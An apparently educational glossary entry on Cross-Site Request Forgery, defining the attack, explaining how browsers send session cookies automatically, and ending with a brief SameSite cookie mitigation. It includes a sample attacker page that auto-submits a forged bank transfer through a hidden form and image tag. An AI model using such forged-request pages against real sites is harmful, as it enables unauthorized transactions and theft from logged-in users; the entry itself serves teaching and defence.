An attack that tricks authenticated users into performing unintended actions on a web application by exploiting the browser's automatic inclusion of credentials.
Cross-Site Request Forgery (CSRF) is an attack that forces authenticated users to execute unwanted actions on a web application. Since browsers automatically include session cookies with requests, attackers can forge requests that the server cannot distinguish from legitimate ones.
The attacker hosts a malicious page that makes requests to a target site. When an authenticated victim visits this page, their browser automatically includes cookies, making the forged request appear legitimate to the server.
Malicious page that transfers money from the victim's bank account:
<!-- Attacker's page -->
<html>
<body>
<img src="https://bank.com/transfer?to=attacker&amount=10000">
<!-- Or using a form for POST requests -->
<form action="https://bank.com/transfer" method="POST" id="csrf">
<input type="hidden" name="to" value="attacker">
<input type="hidden" name="amount" value="10000">
</form>
<script>document.getElementById('csrf').submit();</script>
</body>
</html>
SameSite=Strict or SameSite=Lax